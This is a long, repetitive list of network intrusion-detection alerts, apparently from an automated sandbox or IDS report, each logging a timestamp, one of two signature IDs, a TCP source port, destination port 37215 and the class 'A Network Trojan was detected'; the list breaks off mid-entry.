                Timestamp:05/29/24-15:16:24.940887
                SID:2829579
                Source Port:54366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.522461
                SID:2829579
                Source Port:37976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688065
                SID:2829579
                Source Port:42246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.708474
                SID:2829579
                Source Port:45326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.791484
                SID:2835222
                Source Port:47766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561015
                SID:2835222
                Source Port:45454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.806009
                SID:2829579
                Source Port:58038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782207
                SID:2829579
                Source Port:44944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262192
                SID:2835222
                Source Port:55010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815540
                SID:2835222
                Source Port:44278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521659
                SID:2835222
                Source Port:58114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.921193
                SID:2835222
                Source Port:48154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.226550
                SID:2829579
                Source Port:56614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.736313
                SID:2835222
                Source Port:57454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933265
                SID:2829579
                Source Port:34944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672518
                SID:2835222
                Source Port:37416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.873699
                SID:2835222
                Source Port:53826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215426
                SID:2829579
                Source Port:49984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969814
                SID:2829579
                Source Port:60222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659711
                SID:2829579
                Source Port:52792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794409
                SID:2835222
                Source Port:44646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.567278
                SID:2829579
                Source Port:58130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381132
                SID:2829579
                Source Port:49818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560000
                SID:2829579
                Source Port:59404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824640
                SID:2835222
                Source Port:59868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009897
                SID:2829579
                Source Port:50812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.706540
                SID:2829579
                Source Port:45498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.457899
                SID:2829579
                Source Port:51078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363045
                SID:2829579
                Source Port:43516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675378
                SID:2829579
                Source Port:40878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783285
                SID:2829579
                Source Port:41422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702598
                SID:2829579
                Source Port:37298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390320
                SID:2829579
                Source Port:55680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231221
                SID:2835222
                Source Port:53096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209401
                SID:2829579
                Source Port:47968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.231364
                SID:2829579
                Source Port:40084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231401
                SID:2829579
                Source Port:44468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532862
                SID:2829579
                Source Port:54632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266147
                SID:2835222
                Source Port:33254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849041
                SID:2835222
                Source Port:46564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330631
                SID:2829579
                Source Port:47038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215467
                SID:2835222
                Source Port:60780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277710
                SID:2835222
                Source Port:38878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072658
                SID:2829579
                Source Port:34838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847989
                SID:2835222
                Source Port:39712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209913
                SID:2829579
                Source Port:56480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946826
                SID:2835222
                Source Port:36624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212116
                SID:2829579
                Source Port:53780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037819
                SID:2835222
                Source Port:58224
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435772
                SID:2835222
                Source Port:53152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.896994
                SID:2835222
                Source Port:42734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584983
                SID:2835222
                Source Port:52684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782539
                SID:2829579
                Source Port:34622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.844389
                SID:2829579
                Source Port:37422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.616359
                SID:2835222
                Source Port:59542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982702
                SID:2835222
                Source Port:48720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441096
                SID:2829579
                Source Port:34074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324408
                SID:2835222
                Source Port:54044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885751
                SID:2829579
                Source Port:34852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631836
                SID:2835222
                Source Port:43710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.911011
                SID:2835222
                Source Port:60092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854211
                SID:2835222
                Source Port:54216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.114229
                SID:2829579
                Source Port:58826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227718
                SID:2829579
                Source Port:52042
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914612
                SID:2835222
                Source Port:48986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.812932
                SID:2829579
                Source Port:34246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.656156
                SID:2835222
                Source Port:59478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207310
                SID:2835222
                Source Port:35110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.941557
                SID:2829579
                Source Port:35516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843893
                SID:2835222
                Source Port:45120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141298
                SID:2829579
                Source Port:41526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891273
                SID:2829579
                Source Port:60556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263066
                SID:2829579
                Source Port:37586
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795982
                SID:2835222
                Source Port:43512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721826
                SID:2835222
                Source Port:51994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982492
                SID:2835222
                Source Port:50990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178985
                SID:2829579
                Source Port:60150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263082
                SID:2835222
                Source Port:34358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532694
                SID:2835222
                Source Port:52322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783121
                SID:2829579
                Source Port:36776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557680
                SID:2829579
                Source Port:40104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363528
                SID:2835222
                Source Port:38356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216780
                SID:2829579
                Source Port:34632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474827
                SID:2835222
                Source Port:44080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.968270
                SID:2829579
                Source Port:52528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.513149
                SID:2835222
                Source Port:52400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.102954
                SID:2829579
                Source Port:38498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269441
                SID:2835222
                Source Port:58182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329237
                SID:2835222
                Source Port:59792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721899
                SID:2835222
                Source Port:54526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925931
                SID:2835222
                Source Port:35028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731522
                SID:2829579
                Source Port:40744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.645681
                SID:2835222
                Source Port:41278
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.889016
                SID:2829579
                Source Port:57568
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890881
                SID:2829579
                Source Port:33150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420992
                SID:2835222
                Source Port:50402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.587084
                SID:2835222
                Source Port:60356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320942
                SID:2835222
                Source Port:48806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.079196
                SID:2829579
                Source Port:49550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740604
                SID:2835222
                Source Port:40968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.782918
                SID:2829579
                Source Port:51170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558158
                SID:2829579
                Source Port:46294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.525623
                SID:2829579
                Source Port:41418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070042
                SID:2829579
                Source Port:33372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559171
                SID:2829579
                Source Port:44652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990213
                SID:2829579
                Source Port:42236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179132
                SID:2829579
                Source Port:37614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436032
                SID:2829579
                Source Port:59006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.854479
                SID:2829579
                Source Port:44508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980061
                SID:2835222
                Source Port:55798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852848
                SID:2829579
                Source Port:57552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681999
                SID:2829579
                Source Port:49652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162276
                SID:2829579
                Source Port:59090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514687
                SID:2829579
                Source Port:40012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287062
                SID:2835222
                Source Port:56814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.581275
                SID:2829579
                Source Port:49134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663494
                SID:2829579
                Source Port:37952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.967450
                SID:2835222
                Source Port:58050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.420021
                SID:2835222
                Source Port:37960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175619
                SID:2829579
                Source Port:40984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240786
                SID:2829579
                Source Port:34534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.797732
                SID:2835222
                Source Port:60012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.900369
                SID:2829579
                Source Port:45938
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.320784
                SID:2835222
                Source Port:33904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042418
                SID:2829579
                Source Port:49810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714259
                SID:2835222
                Source Port:43604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281756
                SID:2835222
                Source Port:42642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.855967
                SID:2829579
                Source Port:57614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764162
                SID:2835222
                Source Port:54968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858221
                SID:2835222
                Source Port:48806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967606
                SID:2835222
                Source Port:45452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416103
                SID:2835222
                Source Port:37804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076560
                SID:2835222
                Source Port:33580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.029608
                SID:2829579
                Source Port:56548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.811814
                SID:2835222
                Source Port:56986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336224
                SID:2829579
                Source Port:57630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455039
                SID:2835222
                Source Port:46892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.855764
                SID:2835222
                Source Port:60168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179655
                SID:2835222
                Source Port:59646
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014702
                SID:2829579
                Source Port:36894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785487
                SID:2829579
                Source Port:43966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.961079
                SID:2835222
                Source Port:47578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626471
                SID:2829579
                Source Port:49810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038531
                SID:2835222
                Source Port:57466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292563
                SID:2835222
                Source Port:40812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850201
                SID:2829579
                Source Port:49128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.035487
                SID:2829579
                Source Port:45268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644710
                SID:2829579
                Source Port:35238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814531
                SID:2829579
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844676
                SID:2835222
                Source Port:37198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418140
                SID:2829579
                Source Port:60124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281735
                SID:2829579
                Source Port:34534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813164
                SID:2835222
                Source Port:40500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336510
                SID:2829579
                Source Port:37422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908446
                SID:2835222
                Source Port:45320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.965746
                SID:2829579
                Source Port:37506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265550
                SID:2835222
                Source Port:41800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140734
                SID:2829579
                Source Port:34028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.825932
                SID:2835222
                Source Port:49932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788581
                SID:2835222
                Source Port:59416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023083
                SID:2835222
                Source Port:47712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526736
                SID:2829579
                Source Port:37812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897296
                SID:2829579
                Source Port:36514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899324
                SID:2829579
                Source Port:42708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.713203
                SID:2829579
                Source Port:60804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844105
                SID:2829579
                Source Port:35268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.471949
                SID:2829579
                Source Port:59330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.732819
                SID:2829579
                Source Port:51970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228167
                SID:2829579
                Source Port:39322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208818
                SID:2835222
                Source Port:43236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928741
                SID:2829579
                Source Port:58690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.001128
                SID:2835222
                Source Port:51036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.073984
                SID:2829579
                Source Port:36996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865041
                SID:2829579
                Source Port:60492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.740105
                SID:2829579
                Source Port:36166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857245
                SID:2829579
                Source Port:60760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518834
                SID:2835222
                Source Port:53420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899192
                SID:2835222
                Source Port:46648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.831219
                SID:2835222
                Source Port:45978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009910
                SID:2829579
                Source Port:42316
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.888576
                SID:2835222
                Source Port:56310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173524
                SID:2835222
                Source Port:41918
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074655
                SID:2829579
                Source Port:59606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.624751
                SID:2829579
                Source Port:47354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688984
                SID:2829579
                Source Port:56200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225690
                SID:2835222
                Source Port:38874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177105
                SID:2829579
                Source Port:59844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137020
                SID:2835222
                Source Port:40710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896020
                SID:2829579
                Source Port:35048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864062
                SID:2835222
                Source Port:58780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.113798
                SID:2835222
                Source Port:52682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.047302
                SID:2829579
                Source Port:51180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688971
                SID:2829579
                Source Port:36170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170023
                SID:2835222
                Source Port:59210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.416078
                SID:2829579
                Source Port:60712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.101065
                SID:2835222
                Source Port:34922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.933398
                SID:2835222
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964708
